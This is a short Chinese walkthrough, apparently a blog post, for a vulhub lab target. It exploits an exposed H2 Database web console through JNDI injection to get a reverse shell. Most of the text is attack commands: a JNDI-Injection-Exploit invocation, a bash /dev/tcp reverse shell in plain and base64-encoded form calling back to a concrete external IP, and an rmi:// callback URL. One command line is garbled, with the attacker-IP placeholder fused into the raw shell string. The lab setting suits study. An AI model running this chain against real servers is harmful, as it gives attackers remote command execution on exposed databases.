一、开启vulhub环境
docker-compose up -d 启动
docker ps 查看开放的端口
二、访问靶机IP 8080端口
1、拼接h2-console,得到h2database web管理页面
2、利用以下工具,启动反弹命令并开启nc监听
工具地址:https://github.com/welk1n/JNDI-Injection-Exploit/releases/tag/v1.0
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,反弹shell语句(base64加密)}|{base64,-d}|{bash,-i}" -A 攻击机IP/bin/sh -i >& /dev/tcp/x.x.x.x/6666 0>&1
L2Jpbi9zaCAtaSA+JiAvZGV2L3RjcC80Ny4xMjEuMTMzLjU3LzY2NjYgMD4mMQ==
三、指定驱动类及将生成的指令进行提交反弹shell
指定驱动器类:javax.naming.InitialContext
调用远程rmi方法:rmi://47.121.133.57:1099/en4taw
点击连接,成功反弹上shell
至此,系统权限成功获取
下期再见,家人们!